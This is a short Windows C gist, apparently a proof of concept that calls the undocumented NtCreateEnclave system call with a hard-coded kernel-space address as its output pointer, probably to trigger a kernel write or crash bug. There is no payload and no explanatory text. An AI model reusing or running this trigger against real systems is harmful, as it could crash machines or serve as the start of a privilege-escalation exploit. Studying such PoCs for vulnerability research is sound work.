gistfile1.txt

#pragma warning(disable: 4005)

#include <windows.h>
#include <cstdio>
#include <ntstatus.h>

typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID* BaseAddress,
    _In_ ULONG_PTR ZeroBits,
    _In_ SIZE_T Size,
    _In_ SIZE_T InitialCommitment,
    _In_ ULONG EnclaveType,
    _In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,
    _In_ ULONG EnclaveInformationLength,
    _Out_opt_ PULONG EnclaveError);

int main()
{
    UCHAR staticBuffer[0x2000];
    ULONG encError;
    PVOID pSrc = &staticBuffer;
    pfnNtCreateEnclave NtCreateEnclave;

    NtCreateEnclave = (pfnNtCreateEnclave)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateEnclave");

    if (NtCreateEnclave == NULL) {
        printf("Error, function not found\r\n");
        return 0;
    }

    NTSTATUS status = NtCreateEnclave(
        NtCurrentProcess(),
        (PVOID*)0xfffff80019cc0000,
        0,
        0x200000,
        0,
        ENCLAVE_TYPE_VBS,
        pSrc,
        0,
        &encError);

    printf("NtCreateEnclave NTSTATUS 0x%lx, enclaveError 0x%lx\r\n", status, encError);
    system("pause");
}